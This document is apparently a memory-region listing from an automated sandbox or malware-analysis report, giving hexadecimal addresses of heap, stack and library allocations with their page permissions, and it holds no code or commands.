|
stack
|
page read and write
|
||
233177E000
|
stack
|
page read and write
|
||
16744C67000
|
heap
|
page read and write
|
||
2075EFB5000
|
heap
|
page read and write
|
||
E5B2FFF000
|
stack
|
page read and write
|
||
25B48D02000
|
heap
|
page read and write
|
||
16744C55000
|
heap
|
page read and write
|
||
16744A50000
|
heap
|
page read and write
|
||
653DD7F000
|
stack
|
page read and write
|
||
16744C70000
|
heap
|
page read and write
|
||
16744C81000
|
heap
|
page read and write
|
||
2B01B313000
|
heap
|
page read and write
|
||
21E60282000
|
heap
|
page read and write
|
||
1B42E3A0000
|
trusted library allocation
|
page read and write
|
||
21E60267000
|
heap
|
page read and write
|
||
24543F30000
|
trusted library allocation
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
21E60229000
|
heap
|
page read and write
|
||
653DC77000
|
stack
|
page read and write
|
||
2B020490000
|
trusted library allocation
|
page read and write
|
||
16744C3C000
|
heap
|
page read and write
|
||
16745500000
|
heap
|
page read and write
|
||
BAD05FA000
|
stack
|
page read and write
|
||
78B4B1F000
|
stack
|
page read and write
|
||
2B020313000
|
heap
|
page read and write
|
||
2B020302000
|
heap
|
page read and write
|
||
2B020480000
|
trusted library allocation
|
page read and write
|
||
25B489D0000
|
heap
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
2B020130000
|
trusted library allocation
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
2B01AA00000
|
heap
|
page read and write
|
||
2B02030D000
|
heap
|
page read and write
|
||
2B021010000
|
heap
|
page read and write
|
||
1F779FE0000
|
trusted library allocation
|
page read and write
|
||
2B020031000
|
trusted library allocation
|
page read and write
|
||
64DE9F8000
|
stack
|
page read and write
|
||
78B4EF9000
|
stack
|
page read and write
|
||
1A4F7276000
|
heap
|
page read and write
|
||
2B020306000
|
heap
|
page read and write
|
||
2B020310000
|
heap
|
page read and write
|
||
1F77A230000
|
trusted library allocation
|
page read and write
|
||
1B42E492000
|
heap
|
page read and write
|
||
1F77A220000
|
trusted library allocation
|
page read and write
|
||
2B020326000
|
heap
|
page read and write
|
||
1E39803C000
|
heap
|
page read and write
|
||
21E60276000
|
heap
|
page read and write
|
||
2B01AB26000
|
heap
|
page read and write
|
||
1E397F00000
|
heap
|
page read and write
|
||
2B01FE70000
|
trusted library allocation
|
page read and write
|
||
1674559B000
|
heap
|
page read and write
|
||
E5B26DC000
|
stack
|
page read and write
|
||
25B48C6C000
|
heap
|
page read and write
|
||
24543802000
|
heap
|
page read and write
|
||
21E601E0000
|
trusted library allocation
|
page read and write
|
||
1CB41330000
|
heap
|
page read and write
|
||
16744B50000
|
trusted library allocation
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
2331B7E000
|
stack
|
page read and write
|
||
2A6C8402000
|
heap
|
page read and write
|
||
CA0207F000
|
stack
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
1674557F000
|
heap
|
page read and write
|
||
16745575000
|
heap
|
page read and write
|
||
167455A4000
|
heap
|
page read and write
|
||
16745586000
|
heap
|
page read and write
|
||
2581D35B000
|
heap
|
page read and write
|
||
78B50FE000
|
stack
|
page read and write
|
||
1B42E48D000
|
heap
|
page read and write
|
||
1CB41400000
|
heap
|
page read and write
|
||
1F779340000
|
heap
|
page read and write
|
||
1CB41C02000
|
trusted library allocation
|
page read and write
|
||
24543871000
|
heap
|
page read and write
|
||
F51E77E000
|
stack
|
page read and write
|
||
233197B000
|
stack
|
page read and write
|
||
1A4F723C000
|
heap
|
page read and write
|
||
24543868000
|
heap
|
page read and write
|
||
1F77A280000
|
trusted library allocation
|
page read and write
|
||
16745593000
|
heap
|
page read and write
|
||
653D87B000
|
stack
|
page read and write
|
||
2B020140000
|
trusted library allocation
|
page read and write
|
||
2B020016000
|
trusted library allocation
|
page read and write
|
||
16745583000
|
heap
|
page read and write
|
||
26E7CFF000
|
stack
|
page read and write
|
||
B93A0FD000
|
stack
|
page read and write
|
||
21E60273000
|
heap
|
page read and write
|
||
16745596000
|
heap
|
page read and write
|
||
167455A5000
|
heap
|
page read and write
|
||
2B020329000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
2581D2B3000
|
heap
|
page read and write
|
||
21E60256000
|
heap
|
page read and write
|
||
2B020120000
|
trusted library allocation
|
page read and write
|
||
25B49190000
|
trusted library allocation
|
page read and write
|
||
1E398100000
|
heap
|
page read and write
|
||
2B01BB00000
|
trusted library section
|
page readonly
|
||
2B020011000
|
trusted library allocation
|
page read and write
|
||
2581D310000
|
heap
|
page read and write
|
||
2A6C8502000
|
heap
|
page read and write
|
||
E5B357E000
|
stack
|
page read and write
|
||
25B49202000
|
heap
|
page read and write
|
||
2331A77000
|
stack
|
page read and write
|
||
EEC78FE000
|
stack
|
page read and write
|
||
1B42EDB2000
|
heap
|
page read and write
|
||
2B020326000
|
heap
|
page read and write
|
||
1F7792C0000
|
trusted library allocation
|
page read and write
|
||
1B42E513000
|
heap
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
64DE8F7000
|
stack
|
page read and write
|
||
2B020302000
|
heap
|
page read and write
|
||
1B42E495000
|
heap
|
page read and write
|
||
26E76FE000
|
stack
|
page read and write
|
||
E5B2D7A000
|
stack
|
page read and write
|
||
1CB41452000
|
heap
|
page read and write
|
||
1B42E5E5000
|
heap
|
page read and write
|
||
2A6C83B0000
|
trusted library allocation
|
page read and write
|
||
16745A03000
|
heap
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
16744CDA000
|
heap
|
page read and write
|
||
16745575000
|
heap
|
page read and write
|
||
16745591000
|
heap
|
page read and write
|
||
9D09EFF000
|
stack
|
page read and write
|
||
2B01AA75000
|
heap
|
page read and write
|
||
2B020018000
|
trusted library allocation
|
page read and write
|
||
2B020302000
|
heap
|
page read and write
|
||
2A6C8380000
|
heap
|
page read and write
|
||
6BB3A7B000
|
stack
|
page read and write
|
||
25B48C44000
|
heap
|
page read and write
|
||
16745270000
|
remote allocation
|
page read and write
|
||
64DE4FE000
|
stack
|
page read and write
|
||
21E6027A000
|
heap
|
page read and write
|
||
1B42EDC7000
|
heap
|
page read and write
|
||
B939F7D000
|
stack
|
page read and write
|
||
1F779403000
|
heap
|
page read and write
|
||
1B42EE27000
|
heap
|
page read and write
|
||
1B42E413000
|
heap
|
page read and write
|
||
21E6025F000
|
heap
|
page read and write
|
||
26E7879000
|
stack
|
page read and write
|
||
167455D3000
|
heap
|
page read and write
|
||
167455A0000
|
heap
|
page read and write
|
||
2A6C8424000
|
heap
|
page read and write
|
||
F51E67C000
|
stack
|
page read and write
|
||
1F7793A8000
|
heap
|
page read and write
|
||
1B42E230000
|
heap
|
page read and write
|
||
1B42E3C0000
|
trusted library allocation
|
page read and write
|
||
1A4F7802000
|
trusted library allocation
|
page read and write
|
||
1CB41340000
|
heap
|
page read and write
|
||
25B48A30000
|
heap
|
page read and write
|
||
1A4F725E000
|
heap
|
page read and write
|
||
21E60258000
|
heap
|
page read and write
|
||
E5B31FF000
|
stack
|
page read and write
|
||
1B42E488000
|
heap
|
page read and write
|
||
21E6025E000
|
heap
|
page read and write
|
||
2B021000000
|
heap
|
page read and write
|
||
2B020050000
|
trusted library allocation
|
page read and write
|
||
2A6C8413000
|
heap
|
page read and write
|
||
2B01BAF0000
|
trusted library section
|
page readonly
|
||
21E60302000
|
heap
|
page read and write
|
||
653DB7B000
|
stack
|
page read and write
|
||
25B48C87000
|
heap
|
page read and write
|
||
25B48C29000
|
heap
|
page read and write
|
||
2B020304000
|
heap
|
page read and write
|
||
1B42E455000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
2B01B1E1000
|
trusted library allocation
|
page read and write
|
||
24543902000
|
heap
|
page read and write
|
||
16745585000
|
heap
|
page read and write
|
||
9D09DFF000
|
stack
|
page read and write
|
||
F51E6FE000
|
stack
|
page read and write
|
||
16744C00000
|
heap
|
page read and write
|
||
1B42E465000
|
heap
|
page read and write
|
||
9D09F7F000
|
stack
|
page read and write
|
||
2B02030E000
|
heap
|
page read and write
|
||
26E7B7E000
|
stack
|
page read and write
|
||
B939D7E000
|
stack
|
page read and write
|
||
2B01BAD0000
|
trusted library section
|
page readonly
|
||
2B01AAFC000
|
heap
|
page read and write
|
||
64DEB7F000
|
stack
|
page read and write
|
||
1F7793EC000
|
heap
|
page read and write
|
||
1B42ED43000
|
heap
|
page read and write
|
||
16745A03000
|
heap
|
page read and write
|
||
167455A4000
|
heap
|
page read and write
|
||
21E60245000
|
heap
|
page read and write
|
||
64DEE7A000
|
stack
|
page read and write
|
||
21E60257000
|
heap
|
page read and write
|
||
653DE7F000
|
stack
|
page read and write
|
||
2B020302000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
2B020200000
|
heap
|
page read and write
|
||
2B01AA3D000
|
heap
|
page read and write
|
||
2581D346000
|
heap
|
page read and write
|
||
16745596000
|
heap
|
page read and write
|
||
2B01AB02000
|
heap
|
page read and write
|
||
24543800000
|
heap
|
page read and write
|
||
2B020160000
|
trusted library allocation
|
page read and write
|
||
2581D315000
|
heap
|
page read and write
|
||
2B020030000
|
trusted library allocation
|
page read and write
|
||
1F7796F0000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
21E60248000
|
heap
|
page read and write
|
||
16745583000
|
heap
|
page read and write
|
||
2581D334000
|
heap
|
page read and write
|
||
16745585000
|
heap
|
page read and write
|
||
B939E7E000
|
stack
|
page read and write
|
||
1CB4142E000
|
heap
|
page read and write
|
||
258220D0000
|
trusted library allocation
|
page read and write
|
||
2B02030D000
|
heap
|
page read and write
|
||
1B42ED00000
|
heap
|
page read and write
|
||
1A4F7000000
|
heap
|
page read and write
|
||
F51E9FF000
|
stack
|
page read and write
|
||
64DEAFF000
|
stack
|
page read and write
|
||
2B01B39C000
|
heap
|
page read and write
|
||
2B01FEF0000
|
trusted library allocation
|
page read and write
|
||
16745592000
|
heap
|
page read and write
|
||
1B42ED22000
|
heap
|
page read and write
|
||
167455B3000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
2075F090000
|
heap
|
page read and write
|
||
1F7793EC000
|
heap
|
page read and write
|
||
167455B5000
|
heap
|
page read and write
|
||
25B48D13000
|
heap
|
page read and write
|
||
21E60A02000
|
trusted library allocation
|
page read and write
|
||
2A6C8C02000
|
trusted library allocation
|
page read and write
|
||
2B02022C000
|
heap
|
page read and write
|
||
1F7793E4000
|
heap
|
page read and write
|
||
6BB42FE000
|
stack
|
page read and write
|
||
1A4F7308000
|
heap
|
page read and write
|
||
2B020310000
|
heap
|
page read and write
|
||
1A4F7229000
|
heap
|
page read and write
|
||
2B01FE80000
|
trusted library allocation
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
E5B337A000
|
stack
|
page read and write
|
||
2B02030D000
|
heap
|
page read and write
|
||
2B020040000
|
trusted library allocation
|
page read and write
|
||
EEC767E000
|
stack
|
page read and write
|
||
2075EFB0000
|
heap
|
page read and write
|
||
1B42E476000
|
heap
|
page read and write
|
||
21E6025A000
|
heap
|
page read and write
|
||
1E398113000
|
heap
|
page read and write
|
||
64DEF7F000
|
stack
|
page read and write
|
||
E5B30FE000
|
stack
|
page read and write
|
||
24543813000
|
heap
|
page read and write
|
||
2581D318000
|
heap
|
page read and write
|
||
2B01AA9F000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
16744CF9000
|
heap
|
page read and write
|
||
1CB413C0000
|
trusted library allocation
|
page read and write
|
||
26E797F000
|
stack
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
1E397F90000
|
trusted library allocation
|
page read and write
|
||
2B020302000
|
heap
|
page read and write
|
||
24543861000
|
heap
|
page read and write
|
||
CA0257E000
|
stack
|
page read and write
|
||
2B01AA8D000
|
heap
|
page read and write
|
||
2B02023D000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
2B01B800000
|
trusted library allocation
|
page read and write
|
||
1F7793A0000
|
heap
|
page read and write
|
||
167455A0000
|
heap
|
page read and write
|
||
21E6025C000
|
heap
|
page read and write
|
||
2581D320000
|
heap
|
page read and write
|
||
2B01A9F0000
|
trusted library section
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
167455B8000
|
heap
|
page read and write
|
||
1B42E240000
|
heap
|
page read and write
|
||
2A6C843D000
|
heap
|
page read and write
|
||
2075F0A1000
|
heap
|
page read and write
|
||
16744C86000
|
heap
|
page read and write
|
||
16745591000
|
heap
|
page read and write
|
||
16745583000
|
heap
|
page read and write
|
||
2B01B359000
|
heap
|
page read and write
|
||
2B01AA91000
|
heap
|
page read and write
|
||
21E600E0000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
2B01B9E0000
|
trusted library allocation
|
page read and write
|
||
2581D1D0000
|
heap
|
page read and write
|
||
25B48CB9000
|
heap
|
page read and write
|
||
16745597000
|
heap
|
page read and write
|
||
1F7796F9000
|
heap
|
page read and write
|
||
16744CED000
|
heap
|
page read and write
|
||
16744C4F000
|
heap
|
page read and write
|
||
78B4F7E000
|
stack
|
page read and write
|
||
EEC76FE000
|
stack
|
page read and write
|
||
2B02030D000
|
heap
|
page read and write
|
||
1B42E443000
|
heap
|
page read and write
|
||
1A4F7313000
|
heap
|
page read and write
|
There are 685 hidden memdumps, click here to show them.